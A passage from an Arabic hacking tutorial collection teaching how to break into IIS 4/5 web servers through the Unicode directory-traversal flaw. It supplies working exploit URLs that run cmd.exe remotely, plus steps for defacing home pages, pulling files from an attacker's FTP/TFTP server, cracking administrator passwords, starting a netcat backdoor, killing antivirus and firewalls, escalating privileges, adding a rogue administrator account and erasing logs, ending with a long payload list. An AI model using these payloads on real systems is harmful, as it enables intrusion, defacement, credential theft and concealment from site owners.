( وهيكما یلي<br />
- :<br />
.<br />
.<br />
- تعری فبالیونیكود .<br />
- تاریخ ظهور هذهالثغرة<br />
- كیفیةایجاد هذه الثغرات<br />
- كی فیتماستغلالثغراتالیونكود<br />
الاوامرالمستخدمةبواسطة مل ف<br />
طریقةتطبیق هذهالثغرات<br />
- كیفیةاختصارثغرةالیونیكود حتى تتمكن منتفعیلامر ال . ECHO<br />
طریقة نسخ مل فال CMD لاتاحةامكانیةالكتابة على الملفات .<br />
كیفیةمعرفة مشكلةال Access Denied وال حلول المتبعةلها .<br />
- كیفیة عملاكاون تللدخولبواسطة ال . FTP<br />
طریقةكش فباسوردالادمینستریتور<br />
- تغییر الصفحةالرئیسیةللموقع وعملیةالابلوودبواسطةبرنامج<br />
مسح ملفات اللوق حتى لایتمالتعر ف علیك<br />
. TFTP<br />
.<br />
.<br />
. CMD<br />
.<br />
.<br />
-<br />
-<br />
-<br />
-<br />
-<br />
-<br />
٩٣
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
www.3 asfh.<strong>com</strong>/<strong>vb</strong><br />
IIS4.0 /<br />
- تعری فبالیونیكود .<br />
الیونیكود عبارة عن مجموعة من الثغراتفي مجموعة خدمةالمعلوماتالتي ركبت مع<br />
IIS5.0 والذي یاتي عادة مع<br />
. NT4 / Win2k<br />
.<br />
- تاریخ ظهور هذهالثغرة .<br />
لایوجدتاریخ محددلظهوراولثغرةللیونیكودلذایعتبر ظهورهابواسطة شخ ص مجهول<br />
،anonymous person وقیلاناول ظهورلثغراتالیونیكودكانتبواسطة الصینین ولكن لایوجد<br />
مایثبت صحة هذا الكلام لهذه الثغرات، فتماستغلال هذه الثغرات منقبلالمخترقینوتطویرالبرامج<br />
اللازمةلها .<br />
- كیفیةایجاد هذه الثغرات<br />
یتمایجاد هذهالثغرا تبطریقتین -:<br />
<strong>١</strong>- بواسطةالبرامج اللازمة والمخصصةلكش ف هذهالثغرات سواءبالبرامجالتيتعمل على<br />
نظام ویندوزاوبطریقة الشل والتيتعمل على نظاملینكس<br />
٢- بواسطةتطبیق الثغرة علىالموقع مباشرة<br />
.<br />
.<br />
.<br />
.<br />
-<br />
- كی فیتماستغلالثغراتالیونكود<br />
عندتطبیقالثغرة على نظام ال IIS4 / IIS5 یبدا مل ف CMD بفك شفرةالیونكودفي المثالالخطاء<br />
ومنهنایتماستغلالها<br />
الاوامرالمستخدمةبواسطة مل ف . CMD<br />
الاوامرالمستخدمهبواسطة مل فال CMD وهيامر لانشاء دلیل جدید وامر لالغاء دلیل وامر النسخ<br />
وامرالنقل وامر الحذ ف وامرتغییراسماءالملفات وامرلرؤیة محتویات المل ف وامر الكتابة داخلأي<br />
مل ف وامرلسحبأي مل ف ، وهي حسبالامثلةالتالیة<br />
:امرانشاء دلیل جدید<br />
-:<br />
http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.<br />
exe?/c+md+c:\hEx<br />
:امرالغاء دلیل<br />
http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.<br />
exe?/c+rd+c:\hEx<br />
للمعلومیة: لایمكنالغاءأي دلیلالااذاكانفارغاًتمام من الملفات والمجلدات<br />
الامر المستخدم<br />
: للنسخ<br />
http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.<br />
exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.exe<br />
الامر المستخدم<br />
: للنقل<br />
http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../winnt/system32/cmd.exe?/c+m<br />
ove+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.exe+c:\<br />
٩٤
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
www.3 asfh.<strong>com</strong>/<strong>vb</strong><br />
:الامر المستخدم للحذ ف<br />
http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.<br />
exe?/c+del+c:\hEx.mdb<br />
:الامر المستخدم لتغییر مسمى الملفات<br />
http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../winnt/system32/cmd.exe?/c+re<br />
n+c:\index.htm+hEx.htm<br />
:الامر المستخدملرؤیة محتویات الملف<br />
http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.<br />
exe?/c+type+c:\hEx.txt<br />
:الامر المستخدمللكتابة داخلأي مل ف<br />
http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../winnt/system32/cmd.exe?/c+ec<br />
ho+sNiper_hEx+>c:\hEx.txt<br />
:الامر المستخدم لعملیة سحب أي مل ف<br />
علیكالقیاماولاًبنسخالمل فالمراد سحبهالىأي دلیل وبعدهایتم كتابةاسمالمل ففياخرالعنوانكالتالي<br />
:<br />
http://www.xxxx.<strong>com</strong>/msadc/hEx.mdb<br />
.<br />
-<br />
تطبیقالثغرة على الموقع من خلالالمتصف ح تتم حسبالامثلةالتالیة -:<br />
http://www.xxxx.<strong>com</strong>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+di<br />
r+c:\<br />
http://www.xxxx.<strong>com</strong>/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+di<br />
r+c:\<br />
http://www.xxxx.<strong>com</strong>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir<br />
+c:\<br />
http://www.xxxx.<strong>com</strong>/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir<br />
+c:\<br />
http://www.xxxx.<strong>com</strong>/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+di<br />
r+c:\<br />
http://www.xxxx.<strong>com</strong>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+di<br />
r+c:\<br />
http://www.xxxx.<strong>com</strong>/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+di<br />
r +c:\<br />
وقد نحتاج الىتغییر مسمىالدلیلب حی ث یكون -:<br />
Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin<br />
طریقةتطبیق هذهالثغرات<br />
٩٥
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
www.3 asfh.<strong>com</strong>/<strong>vb</strong><br />
.<br />
- كیفیةاختصارثغرةالیونیكود حتى تتمكن منتفعیلامرال ECHO<br />
في حالة اكتشا ف موقعیعاني من مشكلةالیونیكود ولنفتر ضانهكان على هذه الثغرة<br />
-:<br />
http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../..%c0%af../winnt/system32/c<br />
md.exe?/c+dir+c:\<br />
فنحتاج الى نسخ مل ف w3svc.exe الى مجلد inetpub\scripts والامر یكونبهذهالطریقة<br />
- :<br />
http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../..%c0%af../winnt/system32/c<br />
md.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\w3sv<br />
c.exe<br />
بعد نسخ مل ف wالى 3 svc.exe مجلد inetpub\scripts ،الان نقوم بتصفح الموقع من خلال<br />
الثغرةبهذه الطریقة<br />
- :<br />
http://www.xxxx.<strong>com</strong>/scripts/w3svc.exe?/c+dir+c:\<br />
الان نستطیعالكتابة داخلأي مل ف وبالتحدیدالمل فالرئیسيللموقع الذي غالبا مایكونفي هذاالدلیل<br />
inetpub\wwwroot\index.htmب حی ث یكونالامربالشكلالتالي<br />
-:<br />
http://www.xxxx.<strong>com</strong>/scripts/w3svc.exe?/c+echo+Hacked+By+sNipe<br />
r_hEx+hExRay@Hotmail.<strong>com</strong>+>+c:\inetpub\wwwroot\index.htm<br />
-<br />
طریقة نسخ مل فا CMD لاتاحةامكانیةالكتابة على الملفات .<br />
الغر ض من نسخ مل ف الCMD وهو لاعطاءامكانیةللكتابة داخلالسیرفرفي بع ضالحالات ویتم<br />
نسخهالى مجلدالسیكربتبهذه الطریقة<br />
-:<br />
http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../..%c0%af../winnt/system32/c<br />
md.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd<br />
1.exe<br />
الانبامكاننااستخدام مل فالCMDالجدیدفي الثغرةبدلا منالاولبهذا الشكل<br />
- :<br />
http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../..%c0%af../winnt/system32/c<br />
md1.exe?c+dir+c:\<br />
- :<br />
-<strong>١</strong><br />
-كیفیةمعرفة مشكلة ال Access Denied وال حلولالمتبعةلها .<br />
تتممعرفة مشكلةال Access Denied من خلال المحاولةفي حذ فأي مل ف منأيامتداد، فعند<br />
ظهور رسالةال Accessفالیك Denied هذه الطرق حتى تتمكن من الكتابة علىالملفات والتحكم<br />
اكثر علىالسیرفر<br />
الطریقةالاولى نسخ مل فال CMD الى دلیلالسیكربتبمسمى CMD1فسوفیتا حلكامكانیة<br />
الكتابةباستخدامالامر<br />
Copyباستخدام هذاالامر<br />
-:<br />
http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../..%c0%af../winnt/system32/c<br />
md.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd<br />
1.exe<br />
-٢<br />
الطریقةالثانیةبالتعامل معالمل ف ssinc.dll والطریقةكما یلي<br />
اولاانشاء صفحةباسم<br />
- :<br />
test.shtml<br />
o<br />
٩٦
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> www.3 asfh.<strong>com</strong>/<strong>vb</strong><br />
wwwroot/hEx/test.shtml<br />
o<br />
o<br />
o<br />
o<br />
o تكون هذهالصفحة داخل مجلد<br />
o كتابة هذا الكود داخلالصفحة !< file="AAAA[...]AA#-- include"-->ب حیثان<br />
حر فAیتم كتابتة حتىیتعدى ٢٠٤٩ حر ف<br />
الانیتم طلبالصفحة من خلالالمتصفح<br />
الان سو فتظهرلكالصفحة<br />
.<br />
http://www.xxxx.<strong>com</strong>/test.shtml<br />
.<br />
الانتستطیعالكتابهوتمتخطي مشكلةالDenied . Access<br />
.<br />
.<br />
-٣<br />
- ٥<br />
اذا ظهر تلك صفحةالخطاء رقم ٥٠٠فمعناهاانكلمتقم بتطبیقالطریقةبالشكلالص حیح<br />
وعلیكاعادة المحاولة<br />
الطریقة الثالثةباستخدامبرنامج NC.exeب حی ثیتم عملابلوودلهذاالمل ف داخل مجلد ال<br />
Tempفي دلیلالویندوز ومنهیتمتنفیذالاوامر من خلال موجةالدوز وللمعلومیة مجلدال<br />
Temp مفتوح لعملیاتالابلوود<br />
- ٤ الطریقة الرابعة وهي من خلال عملكرا شللسیرفرباستخدامالبرامجاللازمةلهذا الغر ض وهذه<br />
الطریقة غیر مجدیهفيكثیر منالاحیان .<br />
الب حث عن ملفات<br />
ونسخهاالى مجلد c:\inetpub\scripts وتطبیق الثغرة من خلالها .<br />
w3svc.exe ، shell.exe ، sensepost.exe ، root.exe :<br />
- كیفیة عملاكاون تللدخولبواسطةال<br />
نسخ مل ف CMDالى مجلد Scriptsباسم Shell.exe حتىیتمالاستفادة منثغرةقدیمة<br />
. FTP<br />
-<strong>١</strong><br />
/c + copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe<br />
open ftp.host.<strong>com</strong> وكتابةفیهالتالي Echo mspft.pllبواسطةالامر -٢<br />
انشاء مل ف<br />
حیثان هذاهو الخادمللFTP .<br />
/c+echo+open+ftp.host.<strong>com</strong>+>+c:\winnt\mspft.ppl<br />
-٣<br />
/shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl<br />
-٤<br />
الان مطلوباضافة مجهول Anonymousالى نفسالمل فالذيقمنابانشاءه<br />
mspft.pll<br />
الان مطلوبادراج البرید hExRay@Hotmail.Comالى نفس المل ف الذيقمنابانشاءه<br />
mspft.pll<br />
/shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl<br />
mspft.pll<br />
/shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl<br />
-٦<br />
/shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl<br />
٧- یتم هناادراجالموقعالحاليللملفات<br />
/shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft.ppl<br />
-٨<br />
٥-إ ضافة Userقبل Anonymous لزوم المل ف الذيقمنابانشاءه<br />
الانتكرار لحاجةالاعداد<br />
الان یكتباوامر الFTPاللازمةلسحبالمل ف من خادم الFTP وهي Getثم index.htm<br />
یدرج هنابدونالمسجالسابق<br />
/shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl<br />
Quit<br />
/shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl<br />
FTP.exe?+"-s:c:winnt\mspft.ppl”<br />
-<strong>١</strong>٠<br />
-:<br />
- Open FTP.host.<strong>com</strong><br />
٩- هنا نفس السابق ولكنباضافة<br />
الانیتمتنفیذامر<br />
بانشاءها وموجودةفي مل ف mspft.pplباحتوائها على مایلي<br />
وهو عبارة عن خطواتقمنا<br />
٩٧
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
www.3 asfh.<strong>com</strong>/<strong>vb</strong><br />
- Anonymous<br />
- hEx@Hotmail.Com<br />
- User Anonymous<br />
- hEx@Hotmail.Com<br />
- Get index.html<br />
- Quit<br />
/msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-<br />
s:c:\winnt\mspft.ppl"<br />
.<br />
) L0phtCrack ( Microsoft Access – وهي لزومتنفیذ بع ض<br />
- :<br />
-<br />
-<br />
طریقةكش فباسوردالادمینستریتور<br />
نحتاج الى وجودبرنامجین<br />
الخطوات لتالیة وهي<br />
باسوردالادمینستیتورللسیرفر یكون موجودفي مل فال _.SAMفي دلیل<br />
وافضلبرنامج لفك شفرةالباسورد هوبرنامج Lكماهو 0 phtCrack موضحبالشكل التالي:-<br />
\winnt\repair\<br />
-<br />
اذاكان هناك مستخدمینفيالسیرفر ویوجدلدیهم حسابفانمعلوماتهم سو فتكونفي ملف<br />
PASSFILT.DLL ونستطیعتحدید مسار هذ االمل ف من خلالالریجستريبواسطة هذا المفتاح<br />
- :<br />
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\S<br />
YSTEM32\PASSFILT.DLL<br />
-<br />
اذاكانالسیرفریعتمدفي القراءةباستخدام صفحاتال ASPللوصولالىالبیانات من خلال<br />
قاعدة ال MySQLفسو ف نحتاج الىتطبیقثغرة<br />
المسئول عن هذةالقاعده وهيكالتالي<br />
) +.htr ( للوصول الىباسورد<br />
- :<br />
http://www.xxxx.<strong>com</strong>/default.asp+.htr<br />
عند ظهور صفحةالخطافي الوصول الى الصفحةالمطلوبة وبالتحدیدفي سیكربتالتنفیذفالطریقة<br />
ص حیحة وماعلینافقط سوى سحب مل ف database.inc وقراءة محتویاتهللعثور علىاسم<br />
المستخدم والباسوردللمسئول عنقاعدةالبیانات .<br />
٩٨
hi_HaCkEr & MaXhAk2000<br />
. TFTP<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
www.3 asfh.<strong>com</strong>/<strong>vb</strong><br />
- تغییر الصفحةالرئیسیةللموقع وعملیةالابلوودبواسطةبرنامج<br />
قمبانشاء صفحة وضعشعارك علیها واحفظهاباسم index.htm علىال<br />
قم بتشغیلبرنامج TFTP ونفذالامرفي الفقرةالتالیة<br />
c:\<br />
.<br />
/c+tftp.exe+"-<br />
i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\i ndex.htm<br />
-<strong>١</strong><br />
-٢<br />
وهوالبرنامجاللازم لعملالابلوود ویجبان یكون شغالفي حالةتنفیذ<br />
الامر<br />
وهوبمثابةبارامیترز لزومقراءالبیاناتفي مكتبة الملفات<br />
tftp.exe<br />
"-i"<br />
رقمالایبيالخا صبك 1.1.1.1<br />
وهوالامراللازملطلب الملفات مابینالارسال والاستقبال<br />
اسمالمل فبجهازك<br />
اسمالدلیلفيالسیرفر<br />
GET<br />
index.htm<br />
\inetpub\wwwr<br />
oot\<br />
index.htm<br />
اسمالمل ف علىالسیرفر<br />
.<br />
-<br />
مسح ملفات اللوق حتى لایتمالتعر ف علیك<br />
وتتم هذهالعملیة من خلال حذ ف ملفاتال Log من مجلد<br />
System32بواسطةالامر<br />
- :<br />
/c+del+c:/winnt/system32/logfiles/*.log<br />
....<br />
٩٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
$$$$$$$$$$$$$$<br />
XDEMONX:<br />
$$$$$$$$$$$$$$<br />
الكاتب<br />
..<br />
الإختراق عن طریق الیونیكود<br />
(الجزء الثاني) "<br />
في الدرس الأول كان عبارة عناوامراساسیة یستطیعالجمیعتطبیقها ..امافي هذا الدرسفالأمر<br />
یتطلب بع ضالذكاء والمهارة<br />
البدایة<br />
..<br />
:<br />
--------------<br />
عند وجود موقع مصاب بثغرة ما (یونیكود)فاناول شي علیكالقیامبه هو نسخ مجلد cmd الى cmd1<br />
بهذهالطریقة:<br />
C+copy+c:\winnt\system32+<br />
Echo .. هوتفعیلامر الكتابة c:\winnt\system32\cmd1.exeوالسبب<br />
وبعد ذلك نفذالثغرة منالمل فالجدید ( CMD1.exe هذا شيیعرفه الجمیع )لكنللتذكیرفقط !<br />
الان عندتصف حكلملفاتالموقع منالمتصفح من خلال هذهالثغرةفانه سیكونلدیك صلاحیات<br />
IWAM_USERوهذا المستخدم هو عبارة عن یوزرینتميللمجموعه Guest وهوالیوزرالمسؤوول<br />
عنتشغیل سیرفر. IIS<br />
وبماانه من مجموعة Guestفهو لا یملك صلاحیاتكثیرة !!الااذاتماعدادهبشكل سيء :)<br />
(: هذافيانظمة *nix امافي Microsot<br />
..<br />
لایوجد شياكثرادمانا من محاولةال حصول على رووت<br />
فالوضع مختل ف :)فإن محاولةال حصول على صلاحیات Administratorلیسبالسهولةالتي تتوقعها<br />
:)فرفعالامتیازا تبشكل م حليفيانظمة مایكروسوفت ممكنفقطبطر ققلیلة لایتعد ى عددهااصابعالید<br />
الواحده .. وانااكتب هذاالموضو ع لاشر حكیفیةاحكامالسیطرة علىالسیرفر وال حصول على حساب<br />
موارد النظام<br />
مكافيءللمدیر<br />
+الملفات المطلوبة<br />
:) والتمتعبجمیع<br />
:<br />
Sechole.exeوملحقاتها.<br />
Kill.exe<br />
Tlist.exe<br />
ncx99.exe<br />
tftpd32.exe<br />
جهز العده :) ..<br />
لتوفیرالوقت جمعتهافي مجلد واحدهنا<br />
الان سأشرح عملكلاداة :<br />
)<br />
-<strong>١</strong><br />
Secholeوهواقوىاستثمار موجودلرفعالامتیازا تبشكل م حلي ..وطریقة عمله بشكل مبسط)<br />
بأنهیعتمد على صد عفي نواة ویندوزانتي ..یستطیع من خلاله اغتصاب عملیةتابعهلمدیرالنظام یقوم<br />
<strong>١</strong>٠٠
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
من خلالهابرفعامتیازاتك<br />
. (:<br />
list -٢<br />
(:<br />
تقوم بعر ض جمیعالعملیاتالتيتعملبالخلفیه .. والفائده منها هواقفال الفایروول +الانتي<br />
فایروس<br />
٤- Kill.exeعملها متم مللاداةالسابقة حی ث ستقومباقفال رقمالعملیة المستخرج منالاداة السابقة<br />
NCX99نسخه ٥ مطورة من الباكدوور NCینصت علىالمنفذ ٩٩<br />
لنقل الملفاتالىالسیرفر<br />
.<br />
..<br />
4- TFTP32.exe<br />
كل ما سبقكان عبارة عن مقدمه :)اماالعملالحقیقي سیبدأالان<br />
:<br />
اولاقمبرفع جمیعالادواتالسابق الىالسیرفر<br />
ثمقم بتشغیل ncx99.exeبهذاالشكل مثلا<br />
..<br />
:<br />
http://target/scripts/..À¯../winnt/system32/cmd1.exe?/c+C:\ncx99.exe<br />
بعد ذلكقمبالاتصالبالموقع علىالبورت .. ٩٩<br />
ست حصل على سطراوامر CMDبدون<br />
الانقم بتشغیلالاداة .. TLIST ستعر ضلك جمیعالعملیاتالتيتعمل ..قمبالب حث عن رقمالعملیة<br />
صبالانتيفایروسان وجد .. وكذلكاذا وجدت جدار ناري<br />
PIDالخا صبالانتيفایروس والفایروول على ورقه جانبیه<br />
سجل رقم PID الخا مكان PIDتضع رقمالعملیة<br />
مالهد ف مناقفالالانتيفایروس ؟ الاجابة ..أن التحدیثاتالاخیرة منانتيفایروس<br />
ض یسأل البع تتعامل مع Sechole علىانهباكدور .. والان بعد اتمامالعملیاتالسابقةبنجاح ..قم بتشغیل<br />
(:<br />
امتیازا ت. = Guest<br />
..<br />
..<br />
الانقم بقتلالاجراءبالاداة Killبهذاالشكل .. PID : KILL.exe<br />
!<br />
(: Sechole.exeمنالمتصفح.<br />
..<br />
..<br />
.<br />
عندها سیتم رفمامتیازا ت IWAM_USER الى مجموعه.. Administrators<br />
الان بإ مكانكتنفیذه جمیعالاوامر بكاملالحریه وبدوناي مشاكلفيالصلاحیا ت. Access Denided<br />
وطبعااهم شيالكتابة على الصفحهالرئیسیةبامرالایكو:<br />
C+Echo+Hacked+by+XDeMoNX+<br />
> +C;\inetpub\wwwroot\index<br />
.htm<br />
ولكنلیس هذاكل شي<br />
القراصنهالاذكیاء لا یبحثونفقط عنتغییر الصفحهالرئیسیة خصوصااذاكانالموقع مهماو یحتوي على<br />
معلوماتاوقواعدبیانات ...إلخ :)<br />
سؤال :هلتستطیع الدخولبهذاالیوزر ؟ IWAM_USER الىاي خدمه مثلتلنتاوا فتيبي ؟؟<br />
الاجابة :لا ص حیحانناقمنابرفعامتیزاتهلكننا لا نملككلمه المرور !لانها س تكون مسندهبشكل<br />
عشوائي<br />
<strong>١</strong>٠<strong>١</strong>
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
سیذهبتفكیر البع ض الى ال حصول على مل فالسام وكسره :) هذا ممكن ..لكن یوجد ماهواسهل .<br />
بمااننالدینا حساب مكافيل Administrator ولكننا لا نملككلمةالمرور ما رأیكبإ ضافه یوزر جدید<br />
باسمك معباسورد خاصهبك معامتیازات المدیرایضا !! :)قلیل من الذكاء والتفكیر<br />
قمبانشاء مستند نصي جدید واض ف السطر التالي<br />
.<br />
(:<br />
:<br />
net user Demon pass /add && net localgroup administrators Demon<br />
add.bat واحفظهاباسم. Save as add/والان<br />
:<br />
(: المدراء ..<br />
)<br />
(:<br />
(:<br />
..<br />
توضیح ما فعلناه سابقا هوانشاء مجلد دفعاتي یقومبانشاء یوزر جدید Demon وكلمة مرور Pass<br />
واضافتهالى مجموعةالادمنستریتورز<br />
قمالانبرفعالمل ف add.batثمتشغیلها منالمتصفح بواسطةالیونكود)<br />
الانلدیك حساب مدیر :) وتستطیعالدخولالىاي خدمه ..ا فتيبياوتلنتاو ن تبیوساو غیرها<br />
لاتنسىفيالنهایة مسحالاثار واضافةالابوابالخلیةالخاصةبك لتسهیل الدخولفي المراتالقادمه<br />
طبعالن اتوسعفي هذا الجانب لانه (لكلشیخ طریقة!) وكل واحدلهاسلوبفياخفاءادواته والتحكمفي<br />
الملفات .<br />
(:<br />
نرجعلنقطة سابقة<br />
هلتذكراني طلبت منكاقفال الفایروول ؟؟لماذا ؟<br />
لو جرب تتنفذالامر netstat -an من خلال سطراوامرالان سي ..فانك ستجد منالمنافذ ما یسر القلب<br />
%90منالسیرفراتاللي دخلتها وكانت محمیةبجدران نار :) وجدت المنفذ 139فیها مفتوحابدون<br />
حمایه :)لذافاناقفالالفایرولقد یجعللكاكثر من خیارلاسقاطالهد ف<br />
...(:<br />
<strong>١</strong>٠٢
"<br />
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"معلومات عامة عن كیفیة الاستفادة من ثغرات الیونیكود<br />
$$$$$$$$$$$<br />
الكاتب:بلاكهنتر<br />
$$$$$$$$$$$<br />
الموضوعیتكلم عناسالیبالتحكمفيالسیرفر عبرالیونیكود مع بع ضالمتطلبات<br />
الادواتالمطلوبه<br />
<strong>١</strong>)اداة مسحثغرات یونیكود<br />
٢)برنامج سیرفر TFTPD<br />
٣) معرفة جیدهبالیونیكود<br />
=================================================<br />
<strong>١</strong>) بأمكانكال<br />
((<br />
http://www.devil2k.<strong>com</strong>/<br />
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\<br />
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/<br />
cmd.exe?/c+dir+c:\<br />
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+<br />
c:\<br />
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/sy<br />
stem32/cmd.exe?/c+dir+c:\<br />
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c<br />
:\<br />
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\<br />
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\<br />
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+<br />
c:\<br />
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.ex<br />
e?/c+dir+c:\<br />
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/<br />
cmd.exe?/c+dir+c:\<br />
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir<br />
+c:\<br />
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+<br />
dir+c:\<br />
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/<br />
cmd.exe?/c+dir+c:\<br />
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/s<br />
ystem32/cmd.exe?/c+dir+c:\<br />
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.<br />
exe?/c+dir+c:\<br />
حصول علىثغراتالیونیكود منالعدید من المواقعاو من موقعي<br />
وهذه مهداه منيانا ((بلاك هنتر<br />
:<br />
<strong>١</strong>٠٣
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/c<br />
md.exe?/c+dir+c:\<br />
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../wi<br />
nnt/system32/cmd.exe?/c+dir+c:\<br />
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%<br />
35%63../winnt/system32/cmd.exe?/c+dir+c:\<br />
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\<br />
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\<br />
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/<br />
c+dir+c:\<br />
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cm<br />
d.exe?/c+dir+c:\<br />
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\<br />
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\<br />
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir<br />
+c:\<br />
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe<br />
?/c+dir+c:\<br />
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.<br />
exe?/c+dir+c:\<br />
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/c<br />
md.exe?/c+dir+c:\<br />
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../wi<br />
nnt/system32/cmd.exe?/c+dir+c:\<br />
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%<br />
35%63../winnt/system32/cmd.exe?/c+dir+c:\<br />
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32<br />
/cmd.exe?/c+dir+c:\<br />
/cgibin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.<br />
exe?/c+dir+c:\<br />
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32<br />
/cmd.exe?/c+dir+c:\<br />
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32<br />
/cmd.exe?/c+dir+c:\<br />
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/syste<br />
m32/cmd.exe?/c+dir+c:\<br />
/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.e<br />
xe?/c+dir+c:\<br />
/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.e<br />
xe?/c+dir+c:\<br />
<strong>١</strong>٠٤
<strong>١</strong>٠٥<br />
